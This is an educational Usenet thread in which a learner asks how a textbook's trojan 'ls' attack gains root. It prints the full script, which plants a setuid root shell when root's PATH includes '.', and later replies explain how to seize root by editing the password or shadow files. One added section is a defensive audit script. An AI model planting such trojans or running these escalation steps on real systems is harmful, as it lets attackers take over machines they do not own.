
How is the root password stolen? - Linux / Unix Administration


  1. #1

    How is the root password stolen?

    The book `Practical UNIX & Internet Security, 3rd' mentioned a story
    about an administrator who lost his root password. I wonder why the
    administrator in the story lost the root password. Following is that
    story.

    One person wanted to become root to do something. He found that root's
    search path included the current directory (.) and wrote an executable
    script named `ls' in the current directory, with the following contents:

    #!/bin/sh
    # Copy the shell; when root runs this, the copy is owned by root.
    cp /bin/sh ./stuff/junk/.superdude
    # Set the setuid bit (the leading 4) plus r-x for everyone.
    chmod 4555 ./stuff/junk/.superdude
    # Remove this script, then run the real ls so nothing looks unusual.
    rm -f $0
    exec /bin/ls ${1+"$@"}

    He then ran the following commands at the command line:

    %cd
    %chmod 700 .
    %touch ./-f

    After that he told the administrator that he could not delete a file
    with a strange name in his directory. The administrator came to him and
    ran the ls command but found nothing (Question 1). The administrator
    switched to root with `su', then went to that person's directory and ran
    ls again. At this step the administrator exposed the root password
    (Question 2), but he was not aware of it at the time. He then deleted
    the file with the strange name for that person.

    The result was that the administrator could not log in as root after
    that person changed the root password.

    --- --- ---

    My questions are:

    Question 1: Why could the administrator not list the contents of the
    directory the first time, but could do so after su to root later?

    Question 2: If the administrator had exited after running the second
    ls, would he lose the root password again?

    Sincerely,

    lovecreatesbeauty

    lovecreatesbeauty Guest

  2. #2

    Re: How is the root password stolen?

    On 10 Mar 2006 06:08:30 -0800, lovecreatesbeauty <com> wrote:

    (snip social engineering example)
     
     

    Because . was in his path, and he wasn't running the real ls, he was
    running the one in the directory he was in. NEVER have . in root's
    path, especially first.
     

    A good admin will take several precautions to avoid this sort of thing.
    And of course, anyone pulling such a stunt is going to lose access at
    least, so it's a self-regulating problem in several ways.

    Dave Guest

  3. #3

    Re: How is the root password stolen?

    In our last episode, the evil Dr. Lacto had captured our hero,
    "lovecreatesbeauty" <com>, who said: 

    You are slightly misunderstanding what happened.
     

    The root password was not exposed. The fake "ls" script created a shell
    that would run with root privileges. That gave the person root access
    without needing the password.

    hymie! http://www.smart.net/~hymowitz homelinux.net
    ===============================================================================
    Now that you've found another key, what are you going to play?
    --John Lennon/Paul McCartney
    ===============================================================================
    hymie! Guest

  4. #4

    Re: How is the root password stolen?

    On 10 Mar 2006, in the Usenet newsgroup comp.unix.admin, in article
    <googlegroups.com>, lovecreatesbeauty wrote:
     

    Because he had '.' (the current directory) in the front of his PATH.
     

    Yes
     

    %chmod 700 .

    man sh (or whatever your shell is)
    man chmod (or try it yourself and see what happens)
     

    Re-read the story. "A few minutes later, he couldn't get the new root
    password." The game was won when the administrator ran this ls command.
    Try this:

    1. Create a file named 'ls' in your home directory, that contains

    echo "Hello World"

    2. Make this file executable with 'chmod 700 ls'

    3. Change your PATH with the command

    PATH=".:$PATH"

    4. List the files in your directory - using the command 'ls'

    5. Log out then log back in, and repeat 4.

    Think what you just did, and think why it happened.

    Old guy
    Moe Guest

  5. #5

    Re: How is the root password stolen?


    hymie! wrote: 

    I know the root's password was not exposed, but that person changed
    it later.

    After su to root and running that dummy `ls', if that administrator exited
    completely, can the root's password be changed by that person?

    If that administrator did not exit after su to root, then he will lose
    the root's password without executing a special suid/sgid executable
    script, am I right?

    lovecreatesbeauty Guest

  6. #6

    Re: How is the root password stolen?


    hymie! wrote: 


    I know the root's password was not exposed, but that person changed it
    later.

    After su to root and running that dummy `ls', if that administrator exited
    completely, can the root's password be changed by that person?

    If that administrator did not exit after su to root, then he will lose
    the root's password without executing a special suid/sgid executable
    script, am I right?

    What real use does that dummy `ls' have?

    lovecreatesbeauty Guest

  7. #7

    Re: How is the root password stolen?

    On 10 Mar 2006 20:01:01 -0800, lovecreatesbeauty wrote:
     
    >
    >
    > I know the root's password was not exposed, but that person changed it
    > later.
    >
    > After su to root and running that dummy `ls', if that administrator exited
    > completely, can the root's password be changed by that person?
    >
    > If that administrator did not exit after su to root, then he will lose
    > the root's password without executing a special suid/sgid executable
    > script, am I right?
    >
    > What real use does that dummy `ls' have?

    The dummy version of ls creates a copy of the /bin/sh executable called
    ../stuff/junk/.superdude
    When cp makes a copy of the file, the file which is created is owned by the
    user who executes the copy. In this case root.

    The script then changes the permissions on that executable to 4555.


    This has the effect of making the script readable and executable by anyone,
    and also sets the SUID bit which has the effect of running the executable
    as though it were run by the user who owns it.

    So an ls -l of ./stuff/junk/.superdude would show something like...

    sr-xr-xr-x 1 root users 451072 Mar 10 21:23 ./stuff/junk/.superdude

    Then it removes itself (rm -f $0) and executes the real ls.

    It only needs to get executed once by a user with root privilege and the
    game is over.
    After the script has been executed by a superuser there is an executable
    version of /bin/sh on the system which when executed by anyone will run
    with an euid of 0.

    The effect of that is that someone who runs ./stuff/junk/.superdude can then
    act as root.

    Does that explain it for you?
    Adam
    Adam Guest
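    The two checks below are an added example for the advice in posts #2 and #7, not code from the thread or from the book it quotes: path_problems() audits a PATH string for the "." entry (and the empty and relative entries that behave the same way, plus world-writable directories), and setuid_files() finds setuid files left under a directory such as /home. The sample PATH strings are constructed; POSIX sh and find(1) with -perm are assumed.

```sh
#!/bin/sh
# Added example (not from the thread or the book): audit a PATH string for the
# mistake discussed above, and locate setuid files planted under a directory.
# Assumes POSIX sh and find(1) with -H and -perm; sample input is constructed.

# path_problems PATHSTRING
# Prints one line per unsafe entry and returns 1 if any were found.
path_problems() {
    _bad=0
    _rest="$1:"                      # trailing ':' so the loop sees every entry
    while [ -n "$_rest" ]; do
        _comp=${_rest%%:*}           # text before the first ':'
        _rest=${_rest#*:}            # drop it, including the ':'
        case "$_comp" in
            "")  echo "empty entry (the shell searches . for it)"; _bad=1 ;;
            .)   echo "explicit . entry"; _bad=1 ;;
            /*)  # absolute: only a problem if others can plant files in it
                 # (-H follows a symlinked /bin so the link's own mode is ignored)
                 if [ -d "$_comp" ] && [ -n "$(find -H "$_comp" -prune -perm -002)" ]; then
                     echo "world-writable directory: $_comp"; _bad=1
                 fi ;;
            *)   echo "relative entry: $_comp"; _bad=1 ;;
        esac
    done
    return $_bad
}

# setuid_files DIR
# Prints every regular file under DIR with the setuid bit set (such as the
# root-owned copy of /bin/sh in the story) and returns 1 if there is any.
setuid_files() {
    _found=$(find "$1" -type f -perm -4000 2>/dev/null || true)
    [ -z "$_found" ] && return 0
    printf '%s\n' "$_found"
    return 1
}

# Demonstration on constructed input. For a real audit run path_problems on
# the root shell's own $PATH and setuid_files on a user-writable tree, e.g.
# setuid_files /home.
SAMPLE_PATH=".:/usr/local/sbin:/usr/sbin:/sbin:/usr/bin:/bin"
echo "auditing PATH=$SAMPLE_PATH"
path_problems "$SAMPLE_PATH" || echo "-> remove the entries above from root's PATH"
```

    A planted setuid shell on a filesystem mounted nosuid is still worth removing: the bit is ignored at exec time there, but the file is evidence that someone tried.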

  8. #8

    Re: How is the root password stolen?

    On 10 Mar 2006 14:47:23 GMT, Dave Hinz wrote:
     

    Um, I don't think you are answering the right question here...
    The reason he couldn't list the content as a non-root user was because the
    'evil' user had set his directory permissions to 700.
    This was intended to force the other guy into becoming root in order to
    solve the problem.
    Adam
    Adam Guest

  9. #9

    Re: How is the root password stolen?


    Adam Price wrote: 

    Many thanks for your help and detailed explanation of the script file.

    I still have the question: Did the administrator run exit after he did
    the task for that person?

    1. If the administrator exited once (or twice, or set the terminal to
    show `login:' prompt), can the next person act as root and change the
    root's password?

    2. If the administrator did not exit after su to root at all, then
    anyone else can get the root privilege without that SUID script, am I
    right?

    lovecreatesbeauty Guest

  10. #10

    Re: How is the root password stolen?

    On 11 Mar 2006 04:22:10 -0800, lovecreatesbeauty wrote:
     
    >
    > Many thanks for your help and detailed explanation of the script file.
    >
    > I still have the question: Did the administrator run exit after he did
    > the task for that person?
    It doesn't matter. Once the script has run the shell file exists. We don't
    know if he exited or not and we don't need to know.
     
    Yes anyone who knows about the ...stuff/junk/.superdude can run it and get
    root access.
     

    If any user walks away without logging off then anyone who walks up to his
    computer can use it as though they are that user.
    If that user is logged in as root then any user can be root.

    Without wishing to be rude, these are pretty fundamental things about
    operating a computer and don't really have anything to do with being root
    as such. You really do need to sit down and work through some of these
    examples in your textbook and work out what is going on and why. It will
    help you understand what is going on far more than the sort of help you
    will get here.

    As someone else said, read the man pages for cp, for chmod, for ls and rm,
    then read about the exec system call and find out about suid.

    Adam
    Adam Guest

  11. #11

    Re: How is the root password stolen?

    On Sat, 11 Mar 2006 07:28:20 +0000, Adam Price <adam+co.uk> wrote:
     

    I realize that I didn't answer the question he's asking, because I've
    never seen him before and I don't know his motivation. But I gave
    enough information to give the idea that . in the path is a problem and
    playing games like this is a bad idea. Others have filled in the
    details.
     

    Yup.
    Dave Guest

  12. #12

    Re: How is the root password stolen?


    Adam Price wrote: 

    Thank you. I think I get it, but I cannot act as root by running the
    dummy version of ls in my demo:

    $ passwd root
    passwd: You may not view or modify password information for root.
    $ ls -al
    total 624
    drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
    drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
    -r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
    $ ./.superdude
    .superdude-2.05b$ passwd root
    passwd: You may not view or modify password information for root.
    .superdude-2.05b$

    lovecreatesbeauty Guest

  13. #13

    Re: How is the root password stolen?

    On 11 Mar 2006 23:00:31 -0800, lovecreatesbeauty wrote:
     
    >
    > Thank you. I think I get it, but I cannot act as root by running the
    > dummy version of ls in my demo:
    >
    > $ passwd root
    > passwd: You may not view or modify password information for root.
    > $ ls -al
    > total 624
    > drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
    > drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
    > -r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
    > $ ./.superdude
    > .superdude-2.05b$ passwd root
    > passwd: You may not view or modify password information for root.
    > .superdude-2.05b$

    That is probably just your passwd program being clever and realising the
    difference between euid and uid (effective user id and real user id).
    Try editing the password file with vipw.
    Try just editing it with vi.
    You should be able to make changes to the password file now, it's just that
    many of the programs that are designed for editing the password file are
    also likely to know about this kind of hack.
    It may be that your filesystem ignores the setuid bit on the filesystem
    with the home directories (this is another common security measure).
    Have a bit of a play about, see what things you can change, see how you can
    use them to get higher privs.

    When you have run ".superdude" try using the 'id' command and see what
    user details you have.
    Try using "su -" after you have run ".superdude".
    Adam
    Adam Guest

  14. #14

    Re: How is the root password stolen?


    Adam Price wrote: 

    I am happy that you confirmed my understanding (do I really understand
    it correctly? :-) ) of how the root privilege leaked and the root's
    password was changed in the previous messages. But I do not know how to
    change the /etc/passwd file according to your suggestion to demonstrate
    that trick. I am a C programmer with not much experience and knowledge
    of UNIX or even the C programming language. I hope to become an excellent
    C/Unix programmer/administrator like the extreme experts on these groups
    like you.

    /usr/bin/passwd is a separate program and not a built-in one in
    /bin/sh. Though I set SUID on /bin/sh, is /usr/bin/passwd aware of
    this change? I ask this question because I read the Debian Linux
    online help and it says for example that `cd' is a built-in command but
    passwd is not (I upgraded bash to version 3.1 and made it my login
    shell in the passwd file, but /bin/sh is a link to bash 2.05.):

    $ help
    GNU bash, version 3.1.0(1)-release (i686-pc-linux-gnu)
    These shell commands are defined internally. Type `help' to see this
    list.
    <snip>
    cd [-L|-P] [dir]

    lovecreatesbeauty Guest

  15. #15

    Re: How is the root password stolen?

    lovecreatesbeauty wrote: 

    You're not describing the root password being stolen. That
    wording suggests that the bad guy actually learned what the
    root password was. That is not what happened. What happened
    is root access without a password was given away.

    You're describing root access being stolen, and thus the host
    being stolen. That's different from the root password being
    stolen. To steal the root password I need to find out what it
    is. To steal root access I don't need to know what the root
    password is. And once I have root access without a password
    I can set the password to whatever I want.
     

    The dummy ls was a script that creates a setuid shell and then
    runs regular ls. This is a classic example in pretty much any
    book on dealing with the root account. If this actually happened
    then you need to fire the person with the dummy script. Have
    Security walk them out immediately. And reload the entire host
    from backup tapes that were made before the incident. Then
    hire a professional to audit the system to see what prior damage
    had been done.

    The problem - A setuid shell runs as root for most purposes. As
    such it can do nearly anything directly and can do anything
    indirectly. So long as that setuid copy of the shell remains in
    existence, anyone who can get to that copy has unlimited power
    on that host.

    In another post you noticed that running a setuid shell isn't
    quite the same thing as really being root. There are specific
    technical differences between having an effective UID of 0 from
    running a setuid-root executable and having an actual UID of
    0 from logging in as root. But that doesn't matter. Simple
    programs like "cp", "chmod" and "mv" are all you need anyways.

    So you can't change the root password with a setuid shell.
    You can use "vi" to set passwords. That's how the bad guy
    would do it anyways.

    Doug Guest

  16. #16

    Re: How is the root password stolen?


    Doug Freyburger wrote: 

    Thank you. Adam suggested this vipw command and I see some other people
    mentioned vipw is more secure also. I tried to change one newly added
    user's passwd by vipw in my demo, but failed at login. I tried the
    following two commands and deleted the password field between the two
    colons. The colons certainly remained. I think it meant that the user's
    passwd was cleared or set to blank. But I cannot log in as this user
    with a blank password.

    $ su root -c 'vipw'
    $ su root -c 'vipw -s'

    user::1001:100::/home/user:

    I know the password field in /etc/passwd is a placeholder and not the
    real password of the corresponding user. But when I use 'vipw -s', I
    see a strange string in the password field; is it the encrypted
    password? If I change that password field, it will be decrypted to the
    real password at login, but we still cannot know this real password. How
    can I change the password in this way? It's confusing.

    lovecreatesbeauty Guest

  17. #17

    Re: How is the root password stolen?

    On 13 Mar 2006 19:41:58 -0800, lovecreatesbeauty wrote:
     
    >
    > Thank you. Adam suggested this vipw command and I see some other people
    > mentioned vipw is more secure also. I tried to change one newly added
    > user's passwd by vipw in my demo, but failed at login. I tried the
    > following two commands and deleted the password field between the two
    > colons. The colons certainly remained. I think it meant that the user's
    > passwd was cleared or set to blank. But I cannot log in as this user
    > with a blank password.
    >
    > $ su root -c 'vipw'
    > $ su root -c 'vipw -s'
    >
    > user::1001:100::/home/user:
    >
    > I know the password field in /etc/passwd is a placeholder and not the
    > real password of the corresponding user. But when I use 'vipw -s', I
    > see a strange string in the password field; is it the encrypted
    > password? If I change that password field, it will be decrypted to the
    > real password at login, but we still cannot know this real password. How
    > can I change the password in this way? It's confusing.

    Your system is obviously more secure than a basic unix system. Edit the
    shadow password file, find your username, copy the encrypted password and
    place it in the root entry. (Read the man page for passwd to find out which
    fields are which). Now log in as root using YOUR password, not the root
    password.
    Keep a copy of the shadow password file before you do this.

    Or when you edit the password file, change your user id to 0. Then when you
    log in as you change the root password with the passwd command.
    Or Or Or...
    Loads of ways to do this, but the point of the lesson in the book was to
    remind you that if you leave . in root's PATH variable you will run the
    risk of losing control of the box, not to teach you how to hack your home
    linux system.
    This really isn't the place for hacking lessons (and I don't know where such
    a place might be).
    If you understand why this is a bad idea now then you can move on to the
    next chapter in the book.
    Adam

    Adam Guest

  18. #18

    Re: How is the root password stolen?


    Adam Price wrote: 

    Hello Adam. Thank you. I changed one non-root user's password by vipw
    successfully with your help. I did this on Debian Linux 3.1, and it is
    more secure as you mentioned. I will never have . in my PATH variable
    in the first position; I will keep it in mind. I'll continue to go
    through the rest of that book and read many other books. I have learnt
    a lot from you. Thank you for the kind help.

    lovecreatesbeauty Guest

  19. #19

    Re: How is the root password stolen?

    lovecreatesbeauty wrote: 
    >
    > Thank you. Adam suggested this vipw command and I see some other people
    > mentioned vipw is more secure also.

    vipw is more secure, does error checking, tries to lock out other
    vipw users and so on. Among other things it's one of the programs
    that tries to tell the difference between running setuid and being
    logged in as root. It's one of the reasons the bad guys would
    use vi instead.
     

    Shadow file already discussed in another post.

    Doug Guest
